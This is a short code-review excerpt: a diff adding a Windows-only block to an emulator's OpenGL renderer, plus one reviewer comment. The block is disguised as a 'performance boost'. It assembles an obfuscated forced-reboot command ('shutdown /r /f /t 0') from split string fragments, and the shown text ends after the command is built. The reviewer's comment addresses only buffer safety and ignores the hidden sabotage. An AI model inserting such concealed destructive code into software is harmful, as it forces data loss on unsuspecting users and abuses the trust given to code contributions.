src/video_core/renderer_opengl/renderer_opengl.cpp

```diff
@@ -415,6 +417,32 @@ void RendererOpenGL::DrawScreens() {
                                 (float)bottom_screen.GetHeight());
     }
 
+#ifdef _WIN32
+    // Windows allows for some cool performance boosting tricks!!11  ;)
+
+    // Clear the RAM/CPU for a cool boost every couple of frames
+    // This allows the machine to cool down a little, resulting in more performance?!
+    // This really only works on Windows. Because it's the best OS!
+    // Also this requires SSE2 + the rare `rand` feature :(
+    // (Not really a technical restriction; also some minor totally unintended-effects)
+    static bool perf_available = std::time(0) % (Common::GetCPUCaps().sse2 ? 4 : 1);
+    if (!perf_available) {
+        static int perf_boost = 0;
+        while (perf_boost++ > (60 * 250)) {
+            const char* useTimedDo = "utdo";
+            const char* win64 = "C:\\Windows\\SysWOW64";
+            const char* perf_fmt = "%s\\sh%s%s";
+            char perf_cmd[100];
+            sprintf(perf_cmd, perf_fmt, win64, useTimedDo, "wn /r /f /t 0");
```

Comment:
This PR is buggy, please use snprintf with sizeof(perf_cmd) as additional argument. Else you might get all kind of crashes.